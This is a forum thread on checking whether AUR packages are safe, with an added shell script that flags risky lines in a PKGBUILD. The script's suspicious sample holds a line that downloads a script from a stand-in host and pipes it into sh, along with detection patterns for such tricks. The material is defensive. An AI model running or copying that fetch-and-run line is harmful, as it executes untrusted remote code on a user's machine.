How to check if AUR package is safe?

I don’t use many programs from AUR but there are some.
Usually I use packages with good reputation.
For example Microsoft Core Fonts
Many votes and quite popular.

But there are some more “exotic” programs like Airnef (it can be used to download pictures from Nikon cameras over WiFi) that are not very popular.

I’m aware that I can check PKGBUILD file but I’m not sure what to look for.
Is the source the most important part? And correct me if I’m wrong but even if the source link is correct then I would check the source code of the software right?

So without programming language knowledge, is it even possible to check the software?

1 Like

No. It’s like asking “without knowing Chinese, can I read Chinese?”
In this case, you need to rely on others and hope someone checked the source code. I’m not aware of any badly behaving apps available on the AUR, and if so, the community would probably notice and report the AUR package.

Basically yes; sometimes additional files can be made too, along with the source.

5 Likes

When using the AUR you really should be aware that it’s always at your own risk. Checking the PKGBUILD won’t provide 100% safety. Nevertheless, I’d like to mention that there is a nice tool called aura which scans the PKGBUILD for obvious issues:

https://fosskers.github.io/aura/security.html

5 Likes

Looking at the PKGBUILD, if you can understand it, will make you confident that the package maintainer doesn’t do anything malicious, or in a wrong way that borks your system.
After that, to trust the software itself, there is nothing in the PKGBUILD to help you (just as for repo packages); it’s either the reputation of the software itself on the net, or reading all the code yourself.

Very good question. I have often asked myself the same.
Maybe someone has some helpful information in the future.

Thx for this:

:+1:

I’ll take a look at that.

2 Likes

Me too, and…
I’ll install it from aur :upside_down_face:

1 Like

@860lacov:

This here is probably the best that can be said about the AUR. PKGBUILD and makepkg are well documented, and you don’t need to have a doctorate in CS to understand what is going on, and even what should raise red flags in a PKGBUILD.

If you’re really that worried (to the point of thinking that you need to audit source code for an AUR package), what do you think about the core binary packages [3] that are updated every time you answer “Y” when doing a pacman -Syu?

Finally, a little food for thought:

If I was going to go all malicious on an AUR package, I’d go for the more popular packages…more exposure, as it were. :slight_smile:

[1] grazzolini

[2] [aur-general] acroread package compromised

[3] pacman -Sl core|grep installed

1 Like
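As an added illustration of the “red flags” mentioned above (this is example code written for this thread, not part of the original posts, and not the aura tool or anything from makepkg), here is a small POSIX shell checker that greps a PKGBUILD for the things a cautious reader looks for: sources fetched without TLS, checksums set to `SKIP`, downloads piped straight into a shell, writes outside `$pkgdir` (or `sudo`), and base64/eval obfuscation. Both PKGBUILDs it runs on are constructed samples with made-up `example.invalid` URLs; the function names and the list of patterns are this example's own choices, not an official list.

```shell
#!/bin/sh
# Added example: static red-flag scan for an AUR PKGBUILD. It does not replace
# reading the file; it only points at the lines that deserve a closer look.

# Print matching lines for one pattern; bump the global FLAGS counter on a hit.
flag_if_matches() {  # $1 = PKGBUILD path, $2 = description, $3 = grep -E pattern
  hits=$(grep -nE "$3" "$1") || return 0
  printf '%s\n' "  $2:" "$hits"
  FLAGS=$((FLAGS + 1))
}

# Run every check; the return code is the number of flagged categories (0 = clean).
pkgbuild_red_flags() {  # $1 = PKGBUILD path
  FLAGS=0
  printf 'Checking %s\n' "$1"
  flag_if_matches "$1" "source fetched without TLS" 'http://|ftp://|git://'
  flag_if_matches "$1" "checksum verification disabled (SKIP)" "'SKIP'"
  flag_if_matches "$1" "download piped straight into a shell" \
    '(curl|wget)[^|#]*\|[[:space:]]*(ba)?sh'
  flag_if_matches "$1" "writes to a system path outside \$pkgdir, or uses sudo" \
    '(^|[[:space:];&|])(sudo|cp|install|mv|ln|tee|rm)[[:space:]][^#]*[[:space:]]/(etc|usr|home|opt|var)/'
  flag_if_matches "$1" "obfuscated or dynamically evaluated code" \
    'base64 -d|[[:space:]]eval[[:space:]]'
  return "$FLAGS"
}

# Constructed sample PKGBUILDs (not real AUR packages) to run the checker on.
WORK=$(mktemp -d)
BAD_PKGBUILD="$WORK/PKGBUILD.bad"
CLEAN_PKGBUILD="$WORK/PKGBUILD.clean"

cat >"$BAD_PKGBUILD" <<'EOF'
# Maintainer: constructed sample, not a real package
pkgname=example-tool
pkgver=1.0
pkgrel=1
arch=('x86_64')
url="https://example.invalid/example-tool"
source=("http://example.invalid/example-tool-1.0.tar.gz"
        "helper.sh")
sha256sums=('SKIP'
            '0000000000000000000000000000000000000000000000000000000000000000')
build() {
  cd "$pkgname-$pkgver"
  curl -s http://example.invalid/setup.sh | sh
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
  cp extra.conf /etc/example.conf
}
EOF

cat >"$CLEAN_PKGBUILD" <<'EOF'
# Maintainer: constructed sample, not a real package
pkgname=example-clean
pkgver=1.0
pkgrel=1
arch=('x86_64')
url="https://example.invalid/example-clean"
source=("https://example.invalid/example-clean-1.0.tar.gz")
sha256sums=('1111111111111111111111111111111111111111111111111111111111111111')
build() {
  cd "$pkgname-$pkgver"
  make
}
package() {
  cd "$pkgname-$pkgver"
  make DESTDIR="$pkgdir" PREFIX=/usr install
}
EOF

# The suspicious sample trips four of the five categories; the clean one trips none.
pkgbuild_red_flags "$BAD_PKGBUILD" || echo "-> $? categories flagged"
pkgbuild_red_flags "$CLEAN_PKGBUILD" && echo "-> nothing flagged"
```

Run it against the PKGBUILD you fetched (for instance the one your AUR helper shows you before building); a non-zero exit tells you how many categories need a human look, and the printed line numbers say where. A hit is a prompt to read that part of the file and compare the source URL with the upstream project page, not proof of anything on its own.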

That’s why I use pikaur and I check what is in PKGBUILD files.

To be honest, it’s a matter of faith :smiley:
I just hope that so many people use Linux (Manjaro in this case) that it is quite safe.
I know how to install a system and maintain it, Manjaro and Arch too. I don’t use any weird sites as a software source, but…
if the developers of Manjaro or any other system wanted to put something inside, like a script to send my data from the PC to somewhere, I would not know about the data leaks.
[sorry for my English]

Your English is fine, my friend. :+1:

Sometimes it might be a matter of faith; however, I believe that there are plenty of really, really smart people on the internet, and more likely than not…the kinds of trickery you describe would be caught (and exposed) in fairly short order.